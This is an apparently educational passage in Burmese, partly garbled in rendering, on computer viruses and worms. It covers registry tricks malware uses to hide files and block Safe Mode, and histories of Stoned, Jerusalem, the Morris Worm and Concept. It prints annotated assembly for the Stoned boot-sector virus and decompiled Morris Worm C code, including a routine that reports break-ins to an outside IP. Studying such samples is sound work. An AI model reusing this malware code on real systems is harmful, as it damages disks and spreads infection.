t uf Systtem zdkif? Hiidden zdkif
rsm;toGifijzifhykef;uG,f
,avh&Sdonf/ Windowss pepfwGif Hidden zdkiiffrsm;udk &SmazG a &eftwGufuf Folder
Option rSr Show hiddden files andd folder udka½G a ;cs,fay;&&onf/ tv vm;wl Adkif;&yyfpfrsm;onf ¤if;wdkY\
zdkif Exteension rsm;ududkzHk;uG,f&eft
twGuf Hidde extensionns for know wn file typess udkvnf; jyif
jy Muav
onf/ ayysmufaeao omzdkifrsm;udk &SmazG&ef? zdkifrsm;wGif Extension
E rsmm;udkjyif&eftwG
t uf Foldeer Option
udktoHk;jyjyK&avonf/ Adkif;&yfpfrs r m;onf xd xkodkYjyifEkdifjcif; rjyKap&&ef HKEY__CURRENTT_USER\
Softwaree\Microsoft\W Windows\CuurrentVersioon\Policies\E Explorer at tmuf&Sd NoFFolderOptionns wefzdk;
udk ajymifif;ypfavon nf/ zdkif Exteension udkzHk;uG
u,f&eftwGufrl HKEEY_CURREN NT_USER\S Software\

Microsoft\Windows\CurrentVersion\Explorer\Advanced atmuf&Sd HideFileExt wefzdk;udk ajymif;ypf
avonf/ zdkifrsm;udk zHk;uG,f&eftwGufrl HKEY_CURRENT_USER\Software\ Microsoft\Windows\
CurrentVersion\Explorer\Advanced atmuf&Sd Hidden? SuperHidden ESifh ShowSuperHidden wefzdk;
rsm;udk ajymif;ypfavonf/
Safe Mode rS Boot vkyfír&ap&ef jyKvkyfjcif;
26/ Adkif;&yfpfrsm;onf Windows ESifhtwl Windows pwifcsdefwGif tvkyfvkyfjcif;jzpfav
onf/ tu,fí Safe Mode rS Boot vkyfcJhaomf Welocome Screen tNyD;wGif pwifonfh Adkif;&yfpfrsm;
tvkyfvkyfEkdifjcif;r&Sdawmhay/ tcsdKUaomAkdif;&yfpfrsm;udk þenf;ESifh ESdrfESif;Ekdifonf/ xdktjcif;t&mudk
Adkif;&yfpfa&;om;olrsm; od&SdonfhtwGuf HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\
Control\SafeBoot\ atmuf&Sd Registry Key rsm;udk Adkif;&yfpfu zsufypfavonf/ þodkYjzifh Boot
vkyfcsdefwGif F8 ESdyfNyD; Safe Mode udk0ifa&mufjcif; rjyKEdkifatmif jyKvkyfavonf/

tcef;(4)
emrnfausmf Adkif;&yfpfrsm;ESifh Worm rsm;
ed'gef;
1/ tqdk;½Gm;qHk;aom uGefysLwmAdkif;&yfpfqdkonfrSm uREkfyfwdkYuGefysLwmrsm;udk ul;pufap
aomAdkif;&yfpfjzpfonf/ uHtaMumif;rvSpGmyif uREfkyfwdkYxJrS oef;ESifhcsDaomvlrsm;onf þuHacrIudk
ydkifqdkifxm;MuNyD; uGefysLwmAdkif;&yfpfrsm;aMumifh em&Drsm;pGm? wpfcgw&H aeYrsm;pGmyif uGefysLwmpepf
oefYpifa&;? jyefvnfxm;odkjcif;? jyefvnf&SmazGa&;udpö&yfrsm;jzifh tcsdefrsm;jzKef;wD;cJhMu&ygonf/
,aeYacwfwGif Stunext Worm (tD&ef\e,l;uvD;,m;vkyfief;rsm; &yfqdkif;ap&ef a&;om;xm;aom
Worm) (odkY) Zeus ESifh SpyEye x½dk*sef (ypfrSwfom;aumif\ bPftaumifhrsm;udk cdk;,l&ef a&;om;
xm;aom x½dk*sef) uJhodkYaom Malware rsm;udk wdusaomypfrSwfrsm;tm; wdkufcdkuf&eftwGuf zefwD;
a&;om;vmMuavonf/ Adkif;&yfpfrsm;ESifh Worm rsm;\ tzsufpGrf;yum;aMumifh Hard Drive rsm;udk
jynfhapjcif;? zkdifrsm;udk zsufqD;jcif;? uGef,ufudkav;uefapjcif; jzpfapEkdifovdk enf;ynmydkif;qdkif&m?
rlydkifcGifhydkif;qkdif&m? pdwfydkif;qdkif&mxdcdkufrIrsm;vnf; jzpfay:apygonf/
enf;ynmydkif;qdkif&m xdcdkufrIrsm;
2/ Adkif;&yfpfwpfckudk a&;om;jzefYjzL;vdkufaomf a&;om;oludk,fwkdifyif ¤if;\ysHUESHYrIudk xdef;
csKyfEkdifrnfr[kwfyg/ Adkif;&yfpfonf aqmhzf0Jvfrsm;udk cGJa0jzefYjzL;oHk;pGJolrsm;aMumifh pepfwpfckrS
tjcm;wpfckodkY a½GUoGm;avonf/ Adkif;&yfpfwpfckonf pufvnfywfrIpepfrsm;ESifh o[Zmw jzpfrIudk
rrSef;qEkdifyg/ ¤if;ysHUESHYaepOftwGif; Adkif;&yfpfzefwD;pOfu ray:ao;aom uGefysLwmpepfrsm;ay:
wGifyif a&muf&SdaeEdkifygonf/ xdkYaMumifh Adkif;&yfpfonf uGefysLwmpepfrsm;ESifh o[Zmwjzpf? rjzpfudk
prf;oyf&ef rjzpfEdkifyg/
3/ Adkif;&yfpfrsm;onf ¤if;wdkYuk'frsm;yGm;aeMupOftwGif; Memory Resource rsm;? CPU tcsdef
ESifh Disk ae&mwdkYudk rsm;pGmoHk;pGJEkdifavonf/ erlemtaejzifhjy&aomf Carnegie-Mellon rSausmif;om;
wpfOD;xkwfa0vdkufaom tifwmeuf Worm jzpfonf/ xdk Worm onf zsufqD;&ef&nf½G,fcsufjzifh
zefwD;vdkufjcif; r[kwfaomfvnf; udk,fwdkifyGm;rsm;jcif;jzpfpOfaMumifh Resource rsm;pGmoHk;pGJapcJhNyD;
uGef,uftm; aES;auG;oGm;apcJhygonf/
4/ rnfonfhuGefysLwmAdkif;&yfpfrqdk uGefysLwmoHk;pGJol\y½dk*&rfrsm;udk wGJzufEdkifjcif;aMumifh
tvkyfvkyfonfhtcsdefwGif zdkif\ Checksum udkppfaq;aom y½dk*&rfrsm;tm; ysufpD;apNyD; jyKjyifxm;
aomzdkiftm; tvkyfvkyfap&ef jiif;qdkayvdrfhrnf/ þjzpfpOfwGif Adkif;&yfpfonf xdcdkufrIudkjzpfaprnfh
DoS (Denial of Service) wdkufcdkufrIudk vkyfaqmifEkdifygonf/
usifh0wfESifh rlydkifcGifhqdkif&mxdcdkufrIrsm;
5/ Adkif;&yfpfrsm;onf tcGifhr&SdbJ tcsuftvufrsm;udk jyKjyifonfhtwGuf usifh0wfydkif;qdkif
&mt&aomfvnf;aumif;? Oya'aMumif;t&aomfvnf;aumif; xdcdkufrIrsm;jzpfapavonf/ tu,fí
y½dk*&rfrsm;onf jyKjyifajymif;vJxm;jcif;cH&ygu rlydkifcGifh? ydkifqkdifcGifhESifh y½dk*&rftwGuf enf;ynmydkif;
qdkif&m taxmuftyHhrsm; r&&SdEdkifbJjzpfapavonf/

pdwfykdif;qdkif&m xdcdkufrIrsm;
6/ Adkif;&yfpfrsm;onf pdwfydkif;qkdif&m xdcdkufrIrsm;udkvnf; jzpfyGm;apEkdifavonf/ omref
uGefysLwmoHk;pGJolwpfa,mufonf uGefysLwmrnfodkYtvkyfvkyfonfudk em;vnfjcif;r&Sday/ Za0Z0g
jzpfrIESifh ynmcsdKUwJhrIu olUtm; aMumufvefYrIudkjzpfapygonf/ Adkif;&yfpf (odkY) Worm onf uGefysLwm
oHk;pGJolrsm;udk ¤if;wdkY\uGefysLwmrsm; xdef;csKyfcGifhtm; wm;qD;jcif;? taESmifht,Sufrsm;zefwD;jcif;ESifh
rdrdudk,fudk,HkMunfrI r&Sdapjcif;wdkYudk jzpfapygonf/
Stoned Adkif;&yfpf
7/ tifwmeufray:cifu yxrqHk;uGefysLwmAdkif;&yfpfonf Floppy Disk rsm;rS ysHUESHYcJhyg
onf/ tapmqHk;xJrSwpfckrSm 1987-ckESpfu Boot Sector Adkif;&yfpfjzpfaom Stoned jzpfonf/ ¤if;
onf ]Your Computer is now Stoned! LEGALIZE MARIJUANA!} [k pmwef;ay:vmNyD; ul;puf
cHxm;&aom uGefysLwmoHk;pGJolrsm;tm; rcHcsdrcHomjzpfaponf/ Adkif;&yfpfrsdK;uGJrsm;pGmudk wkya&;om;
cJhMuNyD; &SdNyD;om;Adkif;&yfpfuk'fudk tqifhjr§ifhjcif;jzifh ydkNyD;ul;pufapEdkifap&ef vrf;zGifhay;cJhygonf/
1990 ckESpfwGifay:cJhaom Michelangelo Adkif;&yfpfESifh 1994 ckESpfwGif ay:aygufcJhaom Angelina
Adkif;&yfpfwdkYonf Stoned \ rsdK;EG,fpkrsm;jzpfMuonf/
8/ uGefysLwmonf ul;pufcHxm;&aom Disk rS Boot vkyfaomtcg Stoned Adkif;&yfpfonf
uGefysLwmrSwfOmPfxJwGif aeavawmhonf/ tu,fí tjcm; Hard Drive wpfckrS Boot vkyfcJhaomf
Hard Drive \ Master Boot Record udkppfaq;NyD; ul;pufcHxm;&jcif;r&Sdxm;aomf ul;pufaprnfjzpfyg
onf/ Floppy Disk rsm;udk ul;pufaomtcg Stoned onf Master Boot Record udk Sector 11 odkY
ajymif;a½TUvkdufNyD; Sector 0 wGif ¤if;\uk'frsm;udk xm;avonf/ Hard Drive rsm;udk ul;pufaomtcg
¤if;onf Master Boot Record udk Side 0? Cyl 0? Sector 7 odkYa½TUNyD; ¤if;\uk'frsm;udk Side 0? Cyl 0?
Sector 1 wGif ae&mcsxm;avonf/ Stoned onf 360kB qefYaom 5.25" Floppy ESifh Hard Drive
rsm;udkomul;pufavonf/ Stoned onf uGefysLwmrSwfOmPfwGif; &SdaepOfwGif Floppy rsm;\ Master
Boot Record rsm;udk ul;pufaprnfjzpfonf/ ¤if;onf Hard Drive rsm;udkrl jyefvnful;pufjcif;
rvkyfay/ tu,fí Master Boot Record &Sd Stoned Adkif;&yfpfudk z,f&Sm;cJhvQifyif rSwfOmPfxJ&Sd
Akdif;&yfpfonf Hard Drive udk jyefvnful;puf&ef BudK;pm;rnfr[kwfyg/ Adkif;&yfpfonf rnfonfh
zsufqD;rIudkrS jyKvkyf&ef r&nf½G,fcJhaomfvnf; Adkif;&yfpfonf rlv Boot Sector udk Sector 11 odkYa½TU
onfhtwGuf Sector 11 wGifodrf;xm;aom tcsuftvufrsm; qHk;½HI;rnfjzpfygonf/ tcsdKUaom DOS
pepfrsm;wGif Sector 11 udk File Allocation Table \wpfpdwfwpfa'otjzpf toHk;jyKaomaMumifh
¤if;onf Disk \ FAT pepfudk ysufpD;apygonf/
Stoned_Start:
; set data segment register
000000A1 33C0 xor ax,ax
000000A3 8ED8 mov ds,ax
; create a new stack
000000A5 FA cli
000000A6 8ED0 mov ss,ax
000000A8 BC007C mov sp,7C00h ;
000000AB FB sti
; store (patch) Segment:Offset value of Interrupt 13h
000000AC A14C00 mov ax,[13h * 4 + 0] ; Interrupt Vector 13h Offset
000000AF A3097C mov [Int_13h_Offset],ax
000000B2 A14E00 mov ax,[13h * 4 + 2] ; Interrupt Vector 13h Segment
000000B5 A30B7C mov [Int_13h_Segment],ax

; allocate 2048 bytes memory from the end of real mode memory
000000B8 A11304 mov ax,[0x413] ; MEM 0040h:0013h - BASE MEMORY SIZE IN KBYTES
000000BB 48 dec ax
000000BC 48 dec ax
000000BD A31304 mov [0x413],ax
; * 1024 / 16 = Segment Size
000000C0 B106 mov cl,6 ; 6 bits left shift = * 64
000000C2 D3E0 shl ax,cl
000000C4 8EC0 mov es,ax
000000C6 A30F7C mov [7C00h + Relocated_Memory_Segment],ax ; store segment of relocated memory for
;later usage
; set new Interrupt 13h handler
000000C9 B81500 mov ax,Interrupt_13h
000000CC A34C00 mov [13h * 4 + 0],ax ; Offset
000000CF 8C064E00 mov [13h * 4 + 2],es ; Segment
; now relocate this code to new allocated memory, where int 13h points to
000000D3 B9B801 mov cx,440 ; 440 bytes to copy (everything up to the Partition Table)
000000D6 0E push cs
000000D7 1F pop ds ; from ds:si (code segment:0)
000000D8 33F6 xor si,si
000000DA 8BFE mov di,si ; to es:di (allocated memory:0)
000000DC FC cld
000000DD F3A4 rep movsb ; rep movsd
000000DF 2EFF2E0D00 jmp word far [cs:Relocated_Memory_Offset] ; why not?
Relocated_Memory:
; execute Reset Disk System
000000E4 B80000 mov ax,0
000000E7 CD13 int 13h
; set register for reading the bootloader
000000E9 33C0 xor ax,ax
000000EB 8EC0 mov es,ax ; target segment = 0000h
000000ED B80102 mov ax,0x201 ; function Read Sectors, 1 sector
000000F0 BB007C mov bx,0x7C00 ; data buffer = 0000h:7C00h
; check if hard disk has already been infected
000000F3 2E803E080000 cmp [cs:Hard_Disk_Infected],byte 0
000000F9 740B jz Attack_Floppy_Hard_Disk
; read original bootloader from hard disk and execute it
; if already infected, sector 7 contains the backup, so load & execute
000000FB B90700 mov cx,7 ; sector 7, backup copy
000000FE BA8000 mov dx,80h ; first hard disk
00000101 CD13 int 13h
00000103 EB49 jmp short Stoned_Exit
00000105 90 nop
Attack_Floppy_Hard_Disk:
; - Floppy (first drive) <- will be started later
; - Hard Disk (first drive)
; load the original bootloader from the first floppy drive to 7C00h, will be executed later
00000106 B90300 mov cx,3 ; sector 3
00000109 BA0001 mov dx,0100h ; first floppy, head 1
0000010C CD13 int 13h
0000010E 723E jc Stoned_Exit ; if error, execute original bootloader
; display the message only if multiple of 440 ms time delay
00000110 26F6066C0407 test byte [es:046Ch],00000111b ; 0000h:046Ch = Timer ticks since midnight (updated
; every 55 milliseconds by BIOS)
00000116 7512 jnz Message_Output_Finished
; lets output "Your PC is now Stoned!"
00000118 BE8901 mov si,Stoned_Message
0000011B 0E push cs
0000011C 1F pop ds ; ds:si = message

Message_Output_loop:
0000011D AC lodsb ; next character
0000011E 0AC0 or al,al ; zero?
00000120 7408 jz Message_Output_Finished
00000122 B40E mov ah,0Eh ; function teletype output
00000124 B700 mov bh,0 ; on first page
00000126 CD10 int 10h
00000128 EBF3 jmp short Message_Output_loop
Message_Output_Finished:
; read bootloader from hard disk
0000012A 0E push cs
0000012B 07 pop es
0000012C B80102 mov ax,0x201 ; function Read Sectors, 1 sector
0000012F BB0002 mov bx,0x200 ; to address cs:0200h
00000132 B101 mov cl,0x1 ; sector 1
00000134 BA8000 mov dx,0x80 ; hard disk
00000137 CD13 int 13h
00000139 7213 jc Stoned_Exit
; check whether the hard disk is already infected
0000013B 0E push cs
0000013C 1F pop ds
0000013D BE0002 mov si,0200h ; source ds:si = cs:0200h (the read sector)
00000140 BF0000 mov di,0000h ; compare against this bootloader
00000143 AD lodsw ; 1st word to compare
00000144 3B05 cmp ax,[di]
00000146 7511 jnz Hard_Disk_Not_Infected
00000148 AD lodsw ; 2nd word to compare
00000149 3B4502 cmp ax,[di+0x2]
0000014C 750B jnz Hard_Disk_Not_Infected
Stoned_Exit:
; exit from Stoned, execute original bootloader
0000014E 2EC606080000 mov [cs:Hard_Disk_Infected],byte 0
00000154 2EFF2E1100 jmp word far [cs:Original_Bootloader_Offset] ; exit to original bootloader..
Hard_Disk_Not_Infected:
00000159 2EC606080002 mov [cs:Hard_Disk_Infected],byte 2 ; remember that hard disk has been infected (has
; no effect)
; write backup
0000015F B80103 mov ax,0x301 ; function write sectors, 1 sector
00000162 BB0002 mov bx,0x200 ; data buffer
00000165 B90700 mov cx,7 ; backup copy
00000168 BA8000 mov dx,0x80 ; hard disk
0000016B CD13 int 13h
0000016D 72DF jc Stoned_Exit
; copy Partition Table
0000016F 0E push cs
00000170 1F pop ds ; ds = cs
00000171 0E push cs
00000172 07 pop es ; es = cs
00000173 BEBE03 mov si,0x3BE ; source = read sector
00000176 BFBE01 mov di,0x1BE ; target = copy of this bootloader
00000179 B94202 mov cx,0x242 ; cl = 4 * 16 + 2 (4 Partition Table entries + Magic Number)
0000017C F3A4 rep movsb
; infect the hard disk
0000017E B80103 mov ax,0x301 ; function write sectors, 1 sector
00000181 33DB xor bx,bx
00000183 FEC1 inc cl
00000185 CD13 int 13h
00000187 EBC5 jmp short Stoned_Exit
; Stoned message (7 = BEL, 13 = CF, 10 = LF)

Stoned_Message db 7, "Your PC is now Stoned!", 7, 13, 10, 10, "LEGALISE MARIJUANA!"
times 512-($-$$) db 0
yHk(16) Stoned Adkif;&yfpf\ uk'frsm;
a*s½kqvifAdkif;&yfpf
8/ 1987 wGif tpöa&;wGifawGY&SdcJhaom zdkifrsm;udk ul;pufcJhaom zdkifAdkif;&yfpfjzpfonf/ ¤if;
\Zmpfjrpfonf raocsmvSay/ tpöa&;rS pwifcJhonf[k ,HkMunf&onf/ odkYaomf 1991 ckESpfwGif
awGY&aomtaxmuftxm;rsm;t& ¤if;onf tDwvDrSjzpfEdkifaMumif;awGY&avonf/ 1993 ckESpfwdkif
a*s½kqvifAdkif;&yfpfysHUESHYqJjzpfNyD; ajrmufrsm;vSpGmaom rsdK;uGJrsm;udkvnf; zefwD;cJhMuonf/ a*s½k
qvifAdkif;&yfpfonf .exe zdkifa&m? .com zdkifrsm;udkyg ul;pufNyD; Stoned Adkif;&yfpfxuf ydkNyD;zsufqD;
avonf/ ¤if;onf 13&ufajrmufaeY aomMumaeYwGifom tvkyfvkyfojzifh ysHUEHSYrIonf Stoned xuf
rsm;pGm aES;auG;aomfvnf; a*s½kqvifAdkif;&yfpfonf uGefysLwmoHk;pGJolrsm;\ y½dk*&rfrsm;tm; aomif;
ESifhcsDí zsufqD;cJhavonf/ Adkif;&yfpfonf COMMAND.COM zdkifudkrl zsufqD;jcif;r&Sday/
9/ a*s½kqvifAdkif;&yfpfonf tydkif;ESpfydkif;jzifhvkyfaqmifonf/ wpfydkif;rSm aESmifh,Sufjcif;t
ydkif;jzpfNyD; usefwpfydkif;rSm zsufqD;jcif;tydkif;jzpfonf/ aESmifh,Sufjcif;tydkif;wGif em&D0ufMumNyD;wdkif;
Row 5ck? Column 5ckrSonf Row 16ck? Column 16ck zefwD;jcif;? Black Windows rsm;zefwD;jcif;jzifh
taESmifht,Sufay;avonf/ zsufqD;jcif;tydkif;udkrl 13&ufajrmufaeY aomMumaeYwGif vkyfaqmifNyD;
xdkaeYwGif tvkyfvkyfaom rnfonfhy½dk*&rfudkrqdk zsufqD;ypfavonf/ ¤if;\rsdK;uGJAdkif;&yfpfrsm;rSm
Suriv? Anarkia? Apocalypse? Captain Trip? Mendoza ESifh Nemesis ponfwdkYjzpfonf/
Morris Worm
9/ 1988 Edk0ifbmwGif ysHUESHYcJhaom Morris Worm (ac:) Internet Worm (ac:) Great Worm
tm; yxrqHk; Worm tjzpfowfrSwfEdkifNyD; uGef,ufvHkNcHKa&;ESifh UNIX tajcjyKpufvnfywfrI
pepfrsm;\ tm;enf;csufrsm;ESifhywfoufNyD; BuD;rm;aomtm½HkpdkufrIcHcJh&onfh yxrqHk;aom Worm
vnf;jzpfayonf/ Worm onf Sun Micorsystem \ Sun 3 pepfrsm;ESifh 4BSD Unix rsm;toHk;jyKaom
VAX uGefysLwmrsm;udk ul;pufcJhavonf/ UNIX pepfwGifoHk;aom Sendmail y½dk*&rf\tm;enf;csuf
rSwqifh wdkufcdkufcHcJh&jcif;jzpfonf/ Morris Worm udk Cornell wuúodkvfwGif zefwD;cJhjcif;jzpfaomf
vnf; ¤if;\ZmpfjrpfudkzHk;uG,f&eftwGuf MIT wuúodkvfwGif pwifjzefYcsDcJhonf/
10/ Worm onf Solaris ESifh BSD pepfrsm;&Sd rsh? fingerd ESifh sendmail wdkY\tm;enf;csufrS
wqifh wkdufcdkufcJhonf/ Worm u uGefysLwmtopfonf ul;pufEdkifaMumif; od&SdcJhaomf uGefysLwm
topfqDodkY zdkifrsm;udkydkYavonf/ Worm \tpysdK;rItydkif;wGif ¤if;onf pepfwGif tvkyfvkyfcsdefü
¤if;tm;pHkprf;jcif;rS umuG,f&eftwGuf enf;vrf;rsm;pGmudk aqmif½Gufavonf/ yxrqHk;taejzifh
¤if;\ Argument udk sh [kowfrSwfavonf/ sh onf Born Shell ESifh Process trnfwlnDavonf/
¤if;onf UNIX tajcjyKpepfrsm;wGif awGYaeMu Command Shell wpfckjzpfNyD; tu,fí uGefysLwm
oHk;pGJolrS tvkyfvkyfaeaom Process rsm;pm&if;udk zGifhMunfhvQifyif ¤if;taejzifh owdxm;rdrnf
r[kwfay/ tvm;wl Worm \ Core Dump onf 0 Byte jzpfonf/ xkdYaMumifh Worm onf Crash
jzpfcJhvQif (odkY) Crash jzpfatmif zdtm;ay;cH&vQifyif Worm udk rnfonfhtcsdefrQ awGYEdkifrnfr[kwf
ay/ Worm onf vuf&SdtcsdefudkzwfNyD; aemifwGif usyef;*Pef;rsm; xkwf&eftwGuf ¤if;tcsdefudk
odrf;xm;avonf/

11/ Worm onf NyD;jynfhpHkpGm tvkyfvkyfEkdif&eftwGuf Object zdkifrsm;udk ul;wif&efBudKpm;av
onf/ Worm onf -p Command Line Argument jzifhtvkyfvkyfEdkifNyD; ¤if;onf zdkifrsm;udkul;wifNyD;
aemuf xdkzdkifrsm;udkzsufap&eftwGuf toHk;jyKjcif;jzpfonf/ aemufydkif; rSwfOmPfwGif; tvkyfvkyf
csdefü Disk ay:&Sd rdrdudk,fudkyif jyefzsufavonf/ Worm onf ¤if;aemufxyf toHk;jyK&efrvdkawmh
aom /tmp/.dumb zdkifudkvnf;zsuf&ef BudK;pm;avonf/ tu,fí Object zdkifrsm;xJrS wpfckckudk
ul;wif&ef ratmifjrifcJhvQif? tjcm;pepfrsm;odkY ul;puf&eftwGuf toHk;jyKaom l1.c zdkifudk ul;wif
jcif;rjyKEkdifcJhvQif Worm \tvkyfvkyfjcif; &yfoGm;rnfjzpfonf/ Worm onf Argument Array xJ&Sd
pmom;rsm;udkzsufypfNyD; ¤if;wnf&SdrIudk zkH;uG,favonf/
12/ Worm onf Network Interface rsm;ESifh ¤if;wdkY\ Flag rsm;? Address rsm;udk ppfaq;av
onf/ tu,fí wpfckrSrawGY&SdcJhaomf tvkyfvkyfjcif;&yfoGm;rnfjzpfygonf/ Worm onf Local
Area Network (LAN) rStoHk;jyKaeaom IP Address rsm;udkod&SdEkdif&ef Network Mask udktoHk;jyK
avonf/ ¤if;aemuf -p jzifh Process udkydwfrnfjzpfonf/ þvkyfaqmifcsufrsm;onf Worm \tp
ysdK;rIomjzpfNyD; þvkyfaqmifcsufrsm;NyD;pD;aomf ¤if;\t"duvkyfaqmifcsufudk ac:,lcdkif;apavonf/
13/ Worm \ t"duvkyfaqmifrItydkif;taejzifh pepfwpfckudk ul;pufNyD;aemuf Worm onf
xyfrHul;puf&eftwGuf vufcHuGefysLwmrsm;udk &SmazGrnfh Cracksome [laom Routine wpfckudk
tvkyfvkyfapygonf/ xdkYaemuf Worm onf 30puúefYtcsdeftwGuf tjcm;aom Routine wpfckjzpf
onfh other_sleep udkvkyfaqmifapygvdrfhrnf/ Worm onf Cracksome udkxyfrHtvkyfvkyfapNyD;
Child Process ESpfckudkcGJxkwfum Parent Process udkydwfypfygonf/ Child Process wGif Parent Process
ü&Sdaomtcsuftm;vHk;yg&SdNyD; Child wGif Worm udk&SmazG&cufaprnfh Process eHygwftopf&Sdav
onf/ Worm onf ul;pufcHxm;&aom Process rSwqifhtvkyfvkyfavonf/ xdkYaemuf Worm onf
other_sleep udk 120puúefYMum xyfrHtvkyfvkyfavonf/ Worm onf 128.32.137.13 (ernie.berkeley.
edu) \ Port 11357 qDodkY 1 Byte ydkY&efBudK;pm;avonf/ odkYaomf ¤if;onf UDP udkoHk;&rnfhtpm;
TCP command udkoHk;cJhonfhtwGuf ay;ydkYjcif;atmifjrifrIr&SdcJhyg/ tu,fí Worm onf 12em&D
ausmf tvkyfvkyfcJhaomf ¤if;onf ¤if;\vufcHvdyfpmrsm;xJrS tcsdKUudk &Sif;vif;ypfavonf/ Worm
onf pleasequit Variable udkppfaq;NyD; tu,fí ¤if;\tbd"mefzdkifrsm;rS pum;0Suf 10vHk;xuf
ydkNyD;toHk;jyKcJhvQif tvkyfvkyfjcif;udk &yfqkdif;avonf/
14/ Cracksome Routine tydkif;wGif Morris Worm onf tjcm;aompepfrsm;udk ul;puf&ef
&SmazGNyD; tm;enf;aompum;0Sufrsm;udk azmf&efBudK;pm;avonf/ Worm onf uGefysLwmpm&if;xJrS
wpfckudk ul;puf&eftwGuf /etc/hosts.equiv zdkifrSwqifh zwfavonf/ aemufydkif;wGif ul;pufEdkif&ef
twGuf /.rhosts xJ&Sd 'kwd,pm&if;udk &SmEdkifygao;onf/ Worm onf uGefysLwmxJ&Sd uGefysLwmoHk;pGJ
olrsm;pm&if;ESifh ¤if;wdkY\0Sufxm;aompum;0Sufrsm;yg0ifonfh /etc/passwd zdkifudkzwfNyD; vHkNcHKa&;tm;
enf;csufudk tcGifhaumif;,lygonf/ xdkYaemuf Worm onf tjcm;uGefysLwmrsm;udk Forward ar;vf
ydkY&efESifh aemufxyfwdkufcdkufrnfh uGefysLwmrsm;\wnfae&mudk od&Sd&eftoHk;jyKonfh yk*¾dKvfa&;qdkif&m
.forward zdkifrsm;udk&Sm&eftwGuf /etc/passwd zdkifudktoHk;jyKavonf/
15/ other_sleep Function onf uGefysLwmpepf&Sd tjcm;aom Worm rsm;udk&SmazG&ef BudK;pm;

avonf/ Worm onf þvkyfaqmifcsufudkvkyfaqmif&ef 1;7 av;omtcGifhta&;&SdNyD; yxrqHk;t
Budrf tvkyfvkyfcsdefwGif 30puúefYMumNyD; 'kwd,tcsdefwGifrl 120puúefYMumavonf/ Morris Worm
\tvkyfvkyfyHkESifh uk'fwpfpdwfwpfa'oudk yHk(17)wGif tao;pdwf awGYjrifEkdifygonf/

#include "worm.h"
#include <stdio.h>
#include <signal.h>
#include <strings.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>
extern errno;
extern char *malloc();
int pleasequit; /* See worm.h */
int nobjects = 0;
int nextw;
char *null_auth;
object objects[69]; /* Don't know how many... */
object *getobjectbyname();
char *XS();
main(argc, argv) /* 0x20a0 */
int argc;
char **argv;
{
int i, l8, pid_arg, j, cur_arg, unused;
long key; /* -28(fp) */
struct rlimit rl;
l8 = 0; /* Unused */
strcpy(argv[0], XS("sh")); /* <env+52> */
time(½key);
srandom(key);
rl.rlim_cur = 0;
rl.rlim_max = 0;
if (setrlimit(RLIMIT_CORE, &rl))
;
signal(SIGPIPE, SIG_IGN);
pid_arg = 0;
cur_arg = 1;
if (argc > 2 &&
strcmp(argv[cur_arg], XS("-p")) == 0) { /* env55 == "-p" */
pid_arg = atoi(argv[2]);
cur_arg += 2;
}
for(i = cur_arg; i < argc; i++) { /* otherwise <main+286> */
if (loadobject(argv[i]) == 0)
exit(1);
if (pid_arg)
unlink(argv[i]);
}
if ((nobjects < 1) || (getobjectbyname(XS("l1.c")) == NULL))
exit(1);
if (pid_arg) {
for(i = 0; i < 32; i++)
close(i);
unlink(argv[0]);
unlink(XS("sh")); /* <env+63> */
unlink(XS("/tmp/.dumb")); /* <env+66>"/tmp/.dumb"

*/
}
for (i = 1; i < argc; i++)
for (j = 0; argv[i][j]; j++)
argv[i][j] = '\0';
if (if_init() == 0)
exit(1);
if (pid_arg) { /* main+600 */
if (pid_arg == getpgrp(getpid()))
setpgrp(getpid(), getpid());
kill(pid_arg, 9);
}
mainloop();
}
static mainloop() /* 0x2302 */
{
long key, time1, time0;
time(½key);
srandom(key);
time0 = key;
if (hg() == 0 && hl() == 0)
ha();
checkother();
report_breakin();
cracksome();
other_sleep(30);
while (1) {
/* Crack some passwords */
cracksome();
/* Change my process id */
if (fork() > 0)
exit(0);
if (hg() == 0 && hi() == 0 && ha() == 0)
hl();
other_sleep(120);
time(&time1);
if (time1 - time0 >= 60*60*12)
h_clean();
if (pleasequit && nextw > 0)
exit(0);
}
}
static trans_cnt;
static char trans_buf[NCARGS];
char *XS(str1) /* 0x23fc */
char *str1;
{
int i, len;
char *newstr;
#ifndef ENCYPHERED_STRINGS
return str1;
#else
len = strlen(str1);
if (len + 1 > NCARGS - trans_cnt)
trans_cnt = 0;
newstr = &trans_buf[trans_cnt];
trans_cnt += 1 + len;
for (i = 0; str1[i]; i++)
newstr[i] = str1[i]^0x81;
newstr[i] = '\0';

return newstr;
#endif
}
/* This report a sucessful breakin by sending a single byte to "128.32.137.13"
* (whoever that is). */
static report_breakin(arg1, arg2) /* 0x2494 */
{
int s;
struct sockaddr_in sin;
char msg;
if (7 != random() % 15)
return;
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = REPORT_PORT;
sin.sin_addr.s_addr = inet_addr(XS("128.32.137.13"));
/* <env+77>"128.32.137.13" */
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return;
if (sendto(s, &msg, 1, 0, &sin, sizeof(sin)))
;
close(s);
}
yHk(17) Morris Worm \ uk'frsm;

The Concept Adkif;&yfpf
16/ 1995 ckESpfwGifay:cJhaom The Concept onf Polymorphic Adkif;&yfpfjzpfNyD; Microsoft
Word udkul;pufapcJhonf yxrqHk;Adkif;&yfpfjzpfonf/ W97M/Concept udk Word Prank Macro (odkY)
WW6Macro [kvnf;ac:NyD; þAdkif;&yfpfudk Microsoft Word v6.0 Macro bmompum;jzifh a&;om;
xm;jcif;jzpfavonf/ WM/Concept onf 1995-1997 ckESpftwGif; tvGeftrif;ysHUESHYcJhNyD; ,cktcsdef
wGifrl aysmufuG,fvkeD;eD;jzpfavonf/
17/ Concept wGif Word Macro rsdK;pHkyg0ifavonf/ Word Macro rsm;onf Word Document
rsm;ESifhtwlo,faqmifjzefYjzL;MuaomaMumifh Adkif;&yfpfonf Document zdkifrsm;udk ysHUESHYEkdifavonf/
tajctaetm; ydkrdkqdk;0g;aponfrSm Concept onf Microsoft Word for WIndows 6.x & 7.x? Word
for Machintosh 6.0? Windows 95 ESifh Windows 98 pepfrsm;wGif tvkyfvkyfMujcif;jzpfonf/ Concept
